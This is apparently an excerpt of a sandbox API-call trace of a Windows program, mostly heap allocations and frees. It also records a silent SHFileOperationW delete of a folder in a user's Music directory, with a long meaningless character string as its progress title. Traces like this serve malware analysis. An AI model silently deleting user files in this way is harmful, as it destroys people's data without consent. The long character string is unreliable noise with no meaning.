0x24b17f8 [0251.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0251.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0251.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x24207f0 [0251.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0251.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0251.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0251.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0251.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0251.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0251.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0251.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0251.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0251.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0251.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0251.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0251.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0251.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0251.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0251.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0251.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0251.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0251.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0251.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0251.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0251.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0251.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x70) returned 0x240c8d0 [0251.858] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ditreDSOdEug3Tyrxp1", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ditreDSOdEug3Tyrxp1", lpFilePart=0x8bf658*="ditreDSOdEug3Tyrxp1") returned 0x37 [0251.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c8d0 | out: hHeap=0x25c0000) returned 1 [0251.858] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ditreDSOdEug3Tyrxp1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ditredsodeug3tyrxp1")) returned 0x10 [0251.858] SHFileOperationW (in: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ditreDSOdEug3Tyrxp1", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\xe9e7\xc224\xa7d4\xe773\x7a1c\x98c8\x6db\x9315\x8076\xf631\xcb9f\x9711\xdaca\xb125\x83c2\xa7cc\xad9a\x3cd0\x27ee\x961a\xc100\x5050\xdb9c\xe6db\x824c\xd8fd\x2f5f\x4547\x59f5\xd417\xda5a\xfd97\x430e\xab4\xc043\x9b42\x7048\x838a\x2f05\xa3e7\x92e0\x1de3\xe2c8\xa7f5\x6c93\x2f01\x1aa4\xe893\xb676\xa41f\x3647\x979d\x73c4\xfb85\xeea0\x9832\x39d0\x5c0e\xbf72\xff66\x2a1a\x6bc5\xec11\x9e52\xa76\x85cc\xf9a8\x88d3\xaa8e\x78f0\xed31\x9d42\xf114\x3227\x7c79\x5c56\x8f7c\xfd1d\xe7d\x1f5c\x38a9\x877\x2da0\x69d\xef15\x7c0d\x780d\x9a2d\x5d9f\xee13\xcf8a\xa7f3\xde4c\x48c5\xd845\x1ebf\x3ad8\xcb01\x838a\x24cd\xd7a1\x85dc\x5b20\xf290\x1ba3\x36f8\xfd9a\xd9f6\x8f11\xcaa8\x6d17\x1338\x754f\xb8db\xf544\x11d6\x436e\x6946\x4b2a\x4a71\x938a\x9538\xb27e\xcce2\x2973\xfcfd\x84e\x2966\x54fd\x8417\x20f3\x290c\x2148\xf384\x3c20\xc217\x8a85\x8ab3\x671b\xa9fa\x2173\x780a\xd949\x117a\x562c\x5fa\x1a39\xcb05\x73d7\x43f3\xd432\x2035\x623f\x278c\xb2b4\xab1d\xce0f\xf32c\xfed3\x3518\x1497\x3255\x9b\x42f\x2770\x1236\x8bde\x6231\xf299\xa566\xc764\xd08\x3270\xabe8\xd3f2\x7909\x74a8\x967\x8f6f\xaf90\xf915\xae08\xa4ac\xb7c1\x65de\xf5ff\xd060\x1ba3\xdfb0\xec21\xc92d\xc9de\x615e\x1a38\x71db\xe234\x7cf9\x590f\xe21d\x7ea4\xb71c\xaaa\xb5d9\x7197\x824a\x5f09\x638f\x2ece\xe1e1\x3959\x3a11\x362\x3c05\x4bc7\x9c2d\x6bad\x59b4\x72b3\x403c\xb346\x8b9b\xa8e2\x6037\x34f3\x22a1\x3034\xa279\xaac0\x5908\xa09\xc98a\x2146\xeffb\x7266\xfce1\xc993\x5c\xee7d\x9436\xed71\xb319\x9430\x795a\xd71b\x1f9c\x9113\x4473\xb3e4\xb222\x445c\xe6ee\xf691\x22e5\x2354\x594a\x4229\xcc5f\xa1e4\x22a5\x4e34\x1e84\xa114\x2281\xa2df\xb8db\x6057\xef54\xdbbd\xb081\x1f89\x5249\xeabd\xadc4\x21d\x513\xf6d8\xa91f\x9bb7\x2426\xf8ba\x4923\xb024\xa488\xac2a\xb5db\x3871\x291f\xd4eb\x5287\xe1c4\x9313\xa1b1\xbbd\x482\x3e87\x7b14\x1f48\x514a\x347d\xbf42\x6d11\xbf51\x6d98\x7743\xd5ea\x494e\x8587\x16ef\x2a07\x3311\x7d90\xdbc0\xc724\xceb9\xbd82\x3b6c\x3fcb\xb38c\x3ced\xc52c\x76d9\x1cf6\x8f3b\x76d\x9165\x6719\xbc09\x1e88\x774\x2c7a\xe82e\x2cc2\x4dd\x6e45\x1b8b\x3d9b\x41d1\x5eb8\xba13\xe645\x909e\x6c8d\x8c1a\xfd72\xa744\xb67c\x47a7\x5c74\x1eca\x3742\x438b\x1f7a\xfd42\x660e\x2ee3\x4512\xa90e\xdf3e\x9319\x8db7\xf887\xb5c8\x207e\xdba1\xeaa5\x8ba8\x9e3\xda66\xedc9\xa1a0\x8171\x3ed9\x751\xdf09\x5337\xf668\x9076\x8de3\x63f1\x4a20\x240a\x4f1\x32ec\x6d00\x63ea\x8493\xa119\x2ea3\x6fb2\x3b85\xb8b2\xbb19\x1069\xfa26\xeffc\x375c\xdc4b\x4e84\xbb7d\x346\xe2a\x7f\xbd8a\x536\xe58b\x6d18\x284f\x9446\x2ae1\xd6e\x8c0c\xe9fd\xd007\x62dc\xeaff\x8e01\x7388\xf1b9\x3905\xd079\xf3e\x1aa2\xd7ec\xc43\xdb56\xbf60\xb166\x2950\xec1b\x4437\xaade\xb951\x8b24\x106a\xafe7\x9cc5\x360d\xd2d9\x9e2b\xfea6\x3a69\xac16\x5cd9\x48d1\xcd18\xdfd4\x2344\xe321\xc3ae\x70d0\xca86\xb1ad\xa73d\xfcee\x78fe\x5b20\x4281\x2a6a\x832f\xfce\x2d59\x15bc\xa7b3\xb447\x7a7f\x1e98\xd2f2\xe56d\x2cdf\xe7d6\xe7df\x3ba5\xba54\x2d4f\xbcef\xf177\x7f7c\xd7f9\xe693\xe2f\xe650\xae4d\x4d0b\xbd92\xdbc9\xe554\x6dc9\xf96a\x6a37\x5f40\x96a8\x9f1f\x58bf\xd7bf\x7c97\xfca8\x9178\xe05a\x26f5\xca1f\x9e53\xcfac\x526e\xf65e\x7962\xd08d\x1b0c\x92b0\x1f14\xd408\xd337\xf2d6\x3a4f\x346f\xf295\x3553\xb209\x67a4\x9f96\x9b9a\x9160\x91f4\xa7e5\xf18a\xb439\xdb7c\x9386\x83df\xe5da\xea5a\x9b26\x5db0\x897c\xfe55\xa7b0\x8074\xda97\x2fef\x4191\x6986\xbd94\xfb41\xf03d\x4e1a\xb884\xe15b\xf25\xf644\x6aa1\xc7f9\xd292\xa8a9\x27e5\x6525\xb4ae\x1922\xda12\x6120\xc02e\x51ab\xf067\x15b0\xb023\xf455\xd074\xc6e6\xc6f9\x2946\x3f9b\x53ed\x498a\x902d\x2fb4\xf16\x331\xb4a\xec1b\xb4ea\xe8\xe079\xf0d\x2029\x6868\x58e9\x5c7c\x7a58\x8365\x387d\x5bc4\x8a79\xf0c1\xde86\x79f7\xd5d\x7d2e\x8340\xedd\x3b61\x9887\x6553\x4ae9\x7049\x173b\x124a\x8819\x59ff\x8adc\x4e5\x44ba\x2c9b\x42c8\xd983\x406e\x6d5\x2069\x1f62\x1f45\x7437\xc1be\x5305\xf743\xd4a3\x87b2\x1bb9\x4424\x7310\xd0d4\x716d\x643a\x996f\x8b96\x206b\xa0db\x5013\x6a87\x36ec\xc87d\xdf85\x6823\x98b3\xcc2e\xa034\x5de5\x6b92\xf4bf\x5941\x725a\x9011\x66c8\x7768\x3288\x87e8\xb527\x443f\x43d2\x32aa\x23e9\xf3d5\x6051\xd9fb\x2bd6\xc64\xa22b\x5942\x8fdd\x4fd7\x36c7\x7101\x2b60\x1378\x72b0\x3c36\xb956\x241b\x175b\xac54\xc542\xec74\x900b\x5232\xeefd\xaa9e\xfe77\xd54c\x5bff\x23df\xcf1d\x1a9b\x3bab\xc513\xe86a\xe8fd\x48e2\xdfef\xed4a\xfde9\xe280\xdef8\xfb6f\x26b9\xdd9c\x5e86\xb736\x7a02\xa3b7\xe680\xe9fa\x39ad\x9905\x77df\xb6a9\x505\xb8f4\xbf46\x9680\x9529\x211f\xd12e\x907\x8448\x208d\xb611\xb27a\xe315\xc07e\x7a73\x5886\xea4d\x6d3d\xd0d3\xf651\x682f\xf56c\x769e\xc060\x1df8\x8c04\xa715\x2a41\x78a9\xbc42\xc8a6\x20fa\xa700\x7170\xfc5\xb3c2\x3b75\xe368\xcb35\xae56\xcbd2\x4a57\xa545\xb7f7\x3207\x3188\xe9fe\x51cf\xbe5b\xf808\x843\x58de\x3f46\xd8ce\x72fa\x2eb\xb41\x12d6\xa688\x69da\x30a7\xf131\x7682\xdab2\xf8a9\x313a\xce8f\xd38\x59aa\x9701\x3245\x2220\x6fc3\xcfdd\x1fbd\x7177\xc311\x5b4c\x15b6\xad0a\xd483\x7d66\x58c7\x34d3\x6bb3\x5e3a\xc5e5\x83c\xe28a\xc443\xf99f\x476d\xfb10\x42d1\x4dac\xdbd4\x3d8c\x792b\x5e08\x57b0\xc5a5\x3e5d\x4b9b\x82f7\x2c0\x4c2b\x8f8e\x16d6\x6b58\x5026\x9d6f\x5d0d\x5d17\xe6f8\xb780\x81d2\xde90\x2139\x5bd7\xce7\xc324\xa6b\xa6be\xee8\xacd5\x7af5\x9476\xc234\x6057\x260c\x8641\xe90d\x51f5\x41e1\xa4c0\x27a0\x706a\xf122\x8e62\xc87f\xd605\x20ed\x9b64\xf40d\xf402\xbbf9\x5a1f\xbbca\x7a8b\x82f\x733c\x60\xe517\x69f8\xbc29\xda7f\x7ecb\xed47\x6f13\x8192\x6e33\xb91b\x3d43\xead1\x591d\x4de3\x5ae\x7146\x4435\xda72\x5765\x8bf5\x4498\x7136\x2dd2\x6084\xbd97\x801f\xfa2d\xb168\x3c96\xe7f7\x5ac8\xc892\x12d7\xce31\xd39b\x5980\x21a8\x6162\x43d7\x1370\x1172\x7976\x5a07\x9109\xa76f\x7e3e\x963f\x5a0f\x75f0\xc5d3\x17c6\x80f2\x4b15\x790\x6998\x77ee\xe1b8\x106e\x4e7b\xb858\xb4cc\xdf97\x2186\x646e\xed7f\x6c2b\xbd58\xb37c\xece3\x9927\x707b\x755f\xf280\x7ca6\xadbd\xe05f\x6266\x56d6\xe8d4\x883e\x1c0b\x6ff5\x8b29\xf9fc\x4737\x290c\x7e67\xb211\x1bf5\x2a65\x3492\x1bbe\x96be\xa236\xc209\x1903\x16b7\x5284\xe42c\x2b44\x6477\x5918\xafeb\xd3ac\xa3f7\xce3f\xe050\x8d69\x5d72\x5cec\xa1ca\xc84d\x5912\xc2d0\xec77\xb9f2\x7054\xf423\xfb63\xb87d\xa672\xfbfd\xbe3e\x176\xe457\x4a2e\x72b9\x2140\x414\xe0a6\x704\x6193\xc282\x4276\x84f7\x443f\x8365\xe71d\x1acb\x488\xc8a2\x6c4b\xc05c\x9acf\x2753\x3068\x3c6\xda40\x957f\x12f4\x1ff6\xe2d0\x7d85\x7695\xafd3\x1d41\x693b\xee82\x2ae3\x4200\xe79a\xe2ce\xd3f6\xb26b\xaaf7\x4fd5\xe162\xc869\xb82e\x1d44\x682a\x9215\x4834\x9cd5\xd802\xdcbb\xacc3\x9ab2\xe78b\x8d95\x835c\x21e3\x6058\x50b3\x810\x70ae\x35f\xf962\x58c2\x1022\xcc01\xdbb4\x92de\x9184\x7696\x92b3\x7c3e\x9cf6\x6695\xc520\x6d38\x89ea\x85c0\xd69e\x97a\xd6e8\x4d0f\xb53\xef3d\x2ec6\xa308\xa94c\x4fcb\x6797\xc44\x8033\xc11f\x8845\xe71f\xefae\xea30\x301d\xbfc2\xb004\x111a\xbfe3\xd336\x6f96\xc5c1\x59bd\xd3f8\xd102\x44e3\x3a0c\x8db\x780\x8854\x9dc9\xe7c7\x5b0a\x5bb2\x9c8a\x425b\x351f\x2818\x497\xca94\xda0d\x4dd9\xb56c\x1319\x9034\x40e\x6faa\x53f8\xd504\xf1ed\x3ea8\xa408\x151e\xc3c5\x619b\x3716\x120d\x57a2\x8746\xd1df\xb65b\xd0d\x7e5b\x220d\x78c6\x1e1d\x9061\xad6a\xdd1\xc895\xc856\x1fb1\x6791\x4d87\xf917\xffb4\xf977\x408a\x1bd3\x6cbf\x6432\x1eb5\xc626\x23b8\xa052\xc31f\xd7d\x1c98\x6e07\xee8f\xffa\xb60a\x4729\x727a\xd2c3\x61bb\x4e33\xb9ea\x43fb\xdd5b\x171c\x6586\x7940\x2bf4\xb342\xa171\x6a19\x772c\x7ac8\x681a\x6641\x23da\x9198\x66ee\x7e97\xe38f\x1236\x1af7\xc49d\x15dc\xfd8\x4e99\x51fb\x9c58\xcdd2\x2277\x8f0d\x481c\xd330\xd96e\x452c\xb4d2\x3e04\xef3d\x5236\xbe54\xe15b\x8a76\xfa5\x647b\x9f8c\x8259\xeec2\x7660\xb019\x4d9b\xe117\x3cac\x6f89\xc9b8\x7ec7\x9fb\x6e54\xac3d\xc685\x4196\x7e95\xdc63\x9247\xc89e\x2927\xe77c\x3c26\xc93a\xba32\x3485\xee8f\xcc11\x8493\x922\x2e9e\x2504\xfc7c\x24a6\xb04c\xce5\x8cf7\xe168\x399\x17\x6c3a\x117e\x3b8\xa133\x7f14\xdc70\xe147\xe604\xcd3d\xa493\xe5be\xddc7\x741a\xac5\x173f\xc1e9\x210a\x47f9\xcfd6\x2ade\x7645\xc17\x2305\xe20\x72ac\xc0e3\xdc05\xa8a4\xf81e\x1fc4\xca17\x4db8\x689\x132d\x29c2\x783b\x2485\xcc98\xdca8\x4633\x7abb\xb74\xfe60\xba3d\x514b\x6813\x4f0d\x9c10\x26e5\xcd98\x9846\x6fc3\xc5ab\xba1c\x896e\xc7ec\x6998\x31c7\x6e8a\x8ee9\x6498\xb90a\xd4d4\xa662\x5e3d\xb82d\x18fb\x7fc4\xd374\x388e\xcdb5\xc646\x8595\x736f\xda35\x8188\xec8c\xa426\x2c2f\x4cd6\x4bfb\xcf75\x8b59\xc8bc\xf8fe\x9eac\xcda\xfe0e\xd617\x6d96\x7d62\x7973\x807d\x1725\xea47\xedcb\x6fa9\xd62e\x30b2\x5f56\x7c71\xf57d\xfa91\x87ae\x666c\x6183\x565a\x83fc\x18d7\xb5f1\xf6a4\x2b7b\xfb90\x7fd9\x939\x6d44\x522b\x39b7\xa6ea\xbe6a\x485f\x33ed\xec05\x38a6\xe4d8\x4c28\xb015\x7131\x8bb0\xb0a2\x42b\x606c\x2c1c\x3aa9\x33e2\xc208\x3dad\xc04d\x26bb\x3c02\x4851\xedac\xda66\x8dc6\x1b3d\x1928\x9b51\xb50d\xf8e7\x5051\xacac\xe879\xc82a\x7f9\x89c8\x3946\x5dc8\xb98d\x71fb\x6d9\xbc96\xa356\xe1fb\xbe50\x5bac\x5d68\x6ed0\xf3f7\xa45d\xea17\x1aa2\xf473\x651c\xe1ea\xb8dd\xf393\x46d4\x31be\xe5f6\x1eee\x93d7\xbedf\xa3c9\x3cc2\x19aa\xbf8a\x2275\xd2d7\x1b26\xa188\x42b\xf4\xb342\x37ed\xe44c\xff7b\xbd00\x4386\x14ef\x6d0\x7501\xa0c5\x7117\x9e68\x6e80\x5012\xc4b\xe0ea\x11d0\xba02\x4045\xe3ff\x428b\x5ebf\x5083\x809b\x2ebe\xf5a0\xe831\x1c07\xd9fa\x39bf\xfff4\xf404\x18d5\x9eb4\x1b43\xf405\x125\x175d\x6e83\xd0e0\x8bf\x73e8\x7a02\xc5f\x5bfa\x7d0e\x4054\x129f\x9bd0\xd062\xe0a\x2c5d\xcfa0\x6808\xc56\x98ba\xb43\xf405\x171\x1fed\xce83\xd0e6\x231\x54a\x5bf4\x146f\x813a\x743\x6808\x80a5\x17be\x5e83\xa1ce\x6f5d\xe870\x16a\x8ead\x741\x6872\x1bdb\xfa3c\x2f25\x1d17\x8e1e\x644c\x2ed0\xe871\x9166\x10d7\x5779\xf2c4\x517e\xd08e\xdfe7\xaf88\xcef7\x7418\x873f\x12ae\x47d0\x3404\x62f\x877d\xe743\x680a\x80b9\x888e\x5f41\xd0e5\xbd09\xb5ea\xa0c5\x704f\x5ba8\x5740\xe80a\xf967\x71b1\xd0e6\x104\x407d\x1b40\xd063\x393b\xfd94\x438b\x16ef\xbfd0\xa0c4\x1c85\x43ba\xa740\xe80b\x31a3\xf5e8\xfa1c\x809a\x4fa\x7174\xea0c\xd0e6\x4c7\x9274\x1680\xa0c6\x397d\x58b4\x5540\x1d01\x8313\x9776\x7421\x809a\xb66\x80e8\xf418\xe13\x46bd\xaf40\xd010\x9ae\xe851\xe4e\x281d\xc3a0\xb405\x62d\x937d\xbb43\xc9ff\x6ba3\xf027\x1df9\x9b12\x17df\xf439\x17d\xc3fd\x4e04\x4fb5\x7772\x889c\xccad\x351c\xa1f\xf98e\xb6\x42bd\x7710\x1b5e\x1279\xcf80\x81ec\xf703\x1745\xa183\x12ff\x47c5\xd812\x8830\xc32\xc297\x9a2f\x5202\x3761\x5728\xa822\xe14c\xc112\x6330\x36bc\x964f\xc0e4\x4d80\x63df\xda34\xc5ea\x7a9a\x8c6d\x69a7\xd4a1\x2ee0\xe960\xb7b\xad68\x71ea\xfde8\x5771\xc6a6\x8a49\x11b6\x7ba3\xc950\x9451\xe191\x5add\xa7e3\x5ade\x5d47\xfedc\x2e1a\xae82\xb85b\x58ee\xb47e\x1f90\xb51f\xa9bf\x446\xad7\x1e77\xd0c4\xec93\xd479\xbaaf\x5ba2\xbfda\x8dc1\x9b88\x6cac\x64f1\x5ede\x62a5\x2458\x8ee2\xbcc9\xa9c5\xf8c6\x16df\x1f71\x1b0f\xca00\x6c4d\x52b6\xc451\x65b7\x78ae\x9e1c\xd6ea\x7801\x27a2\xd764\x720f\x5055\x7a5\x2ed9\x6e82\x505b\xe57c\x3c16\x12b2\x8b1a\xa845\x58d5\x82c2\xd8e0\xe6a7\xefa3\x7bda\xda66\x7fe4\xc7a2\xead0\xa1cf\xc19a\xc050\x2822\x1e80\xddc4\x109b\x2ee1\x9565\x65a3\x67e1\x81d7\x39bb\xc826\xdd7b\x96e3\x62e4\x1b44\x67e1\xdf52\x5c82\xb9f3\x5007\xaa8a\x81f2\x6ee6\xf5ae\x4f64\xc937\xc6ec\x9c93\x91cd\xbe92\x5ae5\x3d9a\x20ef\x7816\xd510\x97f9\x926\x3608\xa34a\x9175\x1a58\x3d89\xce24\xbb18\xbd20\xed5a\x2174\xed96\xeb62\x20fc\x2c83\xf4da\xfa2d\xa41d\xfcad\x3087\x8407\x808\x2762\x587f\xdd3a\xeb0b\x2c28\x79c2\x92eb\x92ab\xe416\xeb66\x2a69\xd8b4\x4984\xb3ab\x8bf8\xc86a\x6ff8\xa2a1\x4f92\x2d70\xcbca\x7aab\x9dc3\xb30d\x8ac1\x7771\xc43c\xe4d7\x2819\xb746\xb468\xcf86\x99a2\xea36\x621f\x8eb\xd67\xf9a5\x7bb1\x3484\xf38f\xd20a\x483c\x8bf1\xdd40\xcd2c\xa889\x779a\xf5d5\xd548\x4bc\x1af6\x73b4\xd9e7\xcf91\x2f9c\xcd72\x22f9\x8fef\x148f\xb751\x9461\x8fd8\xfda1\x9f85\x1f44\x8b10\x3ae\xc602\xc3a3\x335\x238\x9dc7\x3833\x8ac9\xd2e2\xb129\xc